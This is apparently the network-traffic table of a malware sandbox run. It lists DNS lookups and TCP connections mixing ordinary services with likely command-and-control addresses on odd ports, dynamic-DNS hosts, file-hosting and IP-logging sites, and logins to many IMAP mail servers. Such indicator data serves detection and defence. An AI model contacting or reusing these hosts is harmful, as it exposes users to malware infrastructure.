| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 91.218.217.172.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | imap.kpnmail.nl | udp |
| NL | 195.121.65.133:993 | imap.kpnmail.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| DE | 195.201.255.35:443 | tcp | |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 133.65.121.195.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | m-api.nexon.com | udp |
| JP | 52.193.97.244:443 | m-api.nexon.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | mi.claro.com.pe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| US | 8.8.8.8:53 | 161.237.225.66.in-addr.arpa | udp |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.hupkeo.link | udp |
| DE | 91.195.240.19:80 | www.hupkeo.link | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 66.225.237.161:443 | mi.claro.com.pe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.irmaosconstrusilva.store | udp |
| US | 162.240.81.18:80 | www.irmaosconstrusilva.store | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 181.129.240.87.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | vk.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.132.67:443 | vk.com | tcp |
| US | 8.8.8.8:53 | api.vk.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | 207.137.240.87.in-addr.arpa | udp |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 195.121.65.133:993 | imap.kpnmail.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | mail.be | udp |
| GB | 212.3.242.82:143 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 87.240.137.207:443 | api.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 188.114.97.0:80 | sl.himanfast.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.tike-taka.com | udp |
| US | 104.18.36.73:80 | www.tike-taka.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| GB | 212.3.242.82:993 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 73.36.18.104.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 34.120.175.65:80 | www.333vvs.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | in.pandora.be | udp |
| BE | 195.130.132.12:993 | in.pandora.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 12.132.130.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.hreeremaeps.com | udp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 188.114.97.0:443 | yip.su | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 194.49.94.47:80 | 194.49.94.47 | tcp |
| US | 8.8.8.8:53 | gobo25cl.top | udp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 8.8.8.8:53 | rawcracker.com | udp |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| US | 8.8.8.8:53 | check.graspalace.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 188.114.97.0:443 | check.graspalace.com | tcp |
| US | 188.114.97.0:80 | check.graspalace.com | tcp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| US | 172.67.194.188:443 | iplogger.com | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | bobkelsofan.com | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| US | 104.21.27.119:443 | bobkelsofan.com | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 194.49.94.152:50500 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 174.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.amazon.com | udp |
| US | 8.8.8.8:53 | www.nnxh.net | udp |
| HK | 154.216.129.246:80 | www.nnxh.net | tcp |
| US | 162.219.225.118:443 | www.amazon.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 118.225.219.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | apiv2.jofogas.hu | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | www.ssongg10834.cfd | udp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| US | 8.8.8.8:53 | 111.69.33.194.in-addr.arpa | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | www.gdjianyong.icu | udp |
| HK | 8.217.92.5:80 | www.gdjianyong.icu | tcp |
| US | 8.8.8.8:53 | s.youtube.com | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 142.250.102.138:443 | s.youtube.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.clawenterprises.net | udp |
| US | 76.223.105.230:80 | www.clawenterprises.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 138.102.250.142.in-addr.arpa | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 230.105.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | imap.tele2.nl | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 20.216.145.82.in-addr.arpa | udp |
| NL | 82.215.18.89:993 | imap.tele2.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | www.pdian.link | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.antsnav.com | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 188.114.96.0:80 | www.antsnav.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 162.219.225.118:443 | www.amazon.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.irmaosconstrusilva.store | udp |
| US | 162.240.81.18:80 | www.irmaosconstrusilva.store | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | gservicese.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.gdjianyong.icu | udp |
| US | 8.8.8.8:53 | www.a0zu3im002.cfd | udp |
| HK | 8.217.92.5:80 | www.gdjianyong.icu | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.telenet.be | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BE | 195.130.132.15:993 | imap.telenet.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api.922proxy.com | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 104.26.9.87:443 | api.922proxy.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 87.9.26.104.in-addr.arpa | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | www.bord90-1us.click | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 188.114.96.0:80 | www.bord90-1us.click | tcp |
| US | 194.49.94.152:50500 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | www.wiz.cn | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.spacecargo.net | udp |
| DE | 195.201.255.35:443 | tcp | |
| US | 13.248.169.48:80 | www.spacecargo.net | tcp |
| CN | 182.92.20.26:443 | www.wiz.cn | tcp |
| CN | 182.92.20.26:443 | www.wiz.cn | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.telfort.nl | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 195.121.65.134:993 | imap.telfort.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| US | 8.8.8.8:53 | 26.20.92.182.in-addr.arpa | udp |
| DE | 195.201.255.35:443 | tcp | |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| DE | 195.201.255.35:443 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.stericyclehq.com | udp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | as.wiz.cn | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| CN | 120.55.138.92:443 | as.wiz.cn | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| US | 8.8.8.8:53 | outlook.office365.com | udp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 40.101.121.34:993 | outlook.office365.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 92.138.55.120.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.121.101.40.in-addr.arpa | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | www.rewards.sony.com | udp |
| US | 104.244.42.129:443 | twitter.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 104.16.122.32:443 | www.rewards.sony.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| US | 8.8.8.8:53 | 129.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.122.16.104.in-addr.arpa | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BE | 195.13.7.87:993 | imap.proximus.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 87.7.13.195.in-addr.arpa | udp |
